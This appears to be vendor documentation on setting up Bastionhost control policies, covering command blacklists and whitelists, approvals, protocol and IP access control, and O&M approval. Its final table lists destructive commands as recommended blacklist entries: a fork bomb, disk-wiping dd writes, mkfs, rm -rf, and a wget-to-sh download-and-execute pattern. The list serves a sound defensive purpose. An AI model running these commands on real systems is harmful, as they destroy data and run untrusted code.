All Products
Search

This Product

    Bastionhost:Configure a control policy

    Document Center

    Bastionhost:Configure a control policy

    Last Updated:Mar 18, 2024

    Bastionhost supports control policies. You can configure command control, command approval, protocol control, and access control policies to manage O&M operations. This prevents users from running high-risk commands or performing misoperations to ensure O&M security.

    Step 1: Create a control policy

    1. Log on to the console of a bastion host. For more information, see Log on to the console of a bastion host.

    2. In the left-side navigation pane, click Control Policies.

    3. On the Control Policies page, click Create Control Policy.

    4. On the Create Control Policy page, configure the Name, Priority, Command Control, Command Approval, Protocol Control, Access Control, and O&M Approval parameters. Then, click Create Control Policy.

      Parameter

      Description

      Name

      Specify the name for the control policy.

      • The name must be 1 to 128 characters in length.

      • The name cannot start with a special character.

      • The name can contain the following special characters: periods (.), underscores (_), hyphens (-), backslashes (\), and spaces.

      Priority

      Specify the priority of the control policy.

      • Valid values: 1 to 100. Default value: 1. The default value specifies the highest priority.

      • You can configure the same priority for different control policies. If multiple control policies have the same priority, Bastionhost determines the order in which the policies apply based on specific rules defined in these policies.

        • Command-related rules are prioritized in descending order: reject, allow, and approve.

        • In access control policies, a blacklist has a higher priority than a whitelist.

      Command Control

      Specify the commands that can or cannot be run by the users or on the assets to which the policy applies.

      • Command Control Type

        • (Blacklist) Listed Commands Are Not Allowed: If you select this option, you can leave the Commands field empty. The commands in a blacklist cannot be run by the users or on the assets to which the policy applies.

        • (Whitelist) Only Listed Commands Are Allowed: If you select this option, you must configure the Commands field. Only the commands in a whitelist can be run by the users and on the assets to which the policy applies.

      • Commands: For more information, see Recommended policies for commands.

      Command Approval

      Specify the commands that can be run only after approval.

      If users run the commands that are specified by the Commands field in the Command Approval (Optional) step, you can choose whether to approve the execution of the commands in the console of the bastion host. Only the commands that are approved can be run. For more information, see Approve commands.

      A command approval policy is used to approve the commands that are not included in the whitelist or blacklist of a command control policy. The command control policy takes precedence over the command approval policy during validation.

      Protocol Control

      Configure the RDP Options, SSH Options, and SFTP Options fields.

      After you select required options, the users to which the policy applies can perform the operations based on the selected options. For example, if you select File Upload, the users can upload files.

      Important

      • You must select at least one of the SSH Channel and SFTP Channel options. If you clear SSH Channel, SSH-based logon is disabled for accounts. Proceed with caution.

      • If you enable Enable Only SFTP Permission for a host account, do not disable SSH Channel and SFTP Channel for the host account in a control policy. Otherwise, the host account cannot be used to access the required server by using the bastion host.

      Access control

      Specify whether a source IP address can access the assets to which the policy applies.

      • (Whitelist) Only Listed IP Addresses Are Allowed: If you select this option, you must configure the IP Addresses field. Users can use only the source IP addresses in a whitelist to access the assets to which the policy applies.

      • (Blacklist) Listed IP Addresses Are Not Allowed: If you select this option, you can leave the IP Addresses field empty. Users cannot use the source IP addresses in a blacklist to access the assets to which the policy applies.

      O&M Approval

      After O&M Approval is enabled, an O&M engineer can log on to the required assets and perform O&M operations only after a Bastionhost administrator approves the O&M application. For more information, see Review an O&M application.

    Step 2: Associate the control policy with assets and users

    On the Assets and Users to Which Policy Is Attached page, you must associate the control policy with assets and users for the policy to take effect on the assets and users.

    1. Associate the control policy with assets. You can select Takes Effect on All Assets or Takes Effect on Selected All Assets.

      • If you select Takes Effect on All Assets, the control policy takes effect on all accounts of assets.

      • If you select Takes Effect on Selected All Assets, after you select assets that you want to associate, you can select Associate All Accounts or Associate Specific Accounts.

      Note

      If you want to associate a control policy with multiple assets or asset accounts at a time, you can add the assets to an asset group at a time and then associate the control policy.

    2. Associate the control policy with users. You can select Apply to All Users or Apply to Selected Users.

    Recommended policies for commands

    The following table describes some commands, and descriptions and recommended policies for the commands. You can configure the parameters in the Command Control (Optional) and Command Approval (Optional) steps based on the following table.

    Command

    Description

    Recommendation policy

    reboot

    Restarts the system.

    This command must be approved before it can be run.

    restart

    Restarts the system.

    This command must be approved before it can be run.

    shutdown

    Shuts down the system.

    This command must be approved before it can be run.

    halt

    Shuts down the system.

    This command must be approved before it can be run.

    poweroff

    Shuts down the system.

    This command must be approved before it can be run.

    init 0

    Stops the system.

    This command must be approved before it can be run.

    pkill

    Terminates multiple processes at a time.

    This command must be approved before it can be run.

    kill

    Terminates a single process.

    This command must be approved before it can be run.

    rm -rf

    Recursively deletes directories and ignores prompts.

    This command must be approved before it can be run.

    mount

    Mounts a file system. This may cause virus replication risks.

    This command must be approved before it can be run.

    umount

    Unmounts a file system.

    This command must be approved before it can be run.

    parted

    Partitions a file system.

    This command must be approved before it can be run.

    format

    Formats the disk.

    This command must be added to a blacklist.

    dd if=/dev/zero of=/dev/had

    Clears the disk.

    This command must be added to a blacklist.

    :(){:|:&};:

    Creates a fork bomb.

    This command must be added to a blacklist.

    (mv)(|.*)(/dev/null)

    Moves a directory to the /dev/null file.

    This command must be added to a blacklist.

    (wget)(|.*)(-O- \| sh)

    Downloads a file and immediately executes the file.

    This command must be added to a blacklist.

    mkfs.ext3 *

    Formats the disk.

    This command must be added to a blacklist.

    dd if=/dev/random of=/dev/*

    Writes data to a block device in a random manner.

    This command must be added to a blacklist.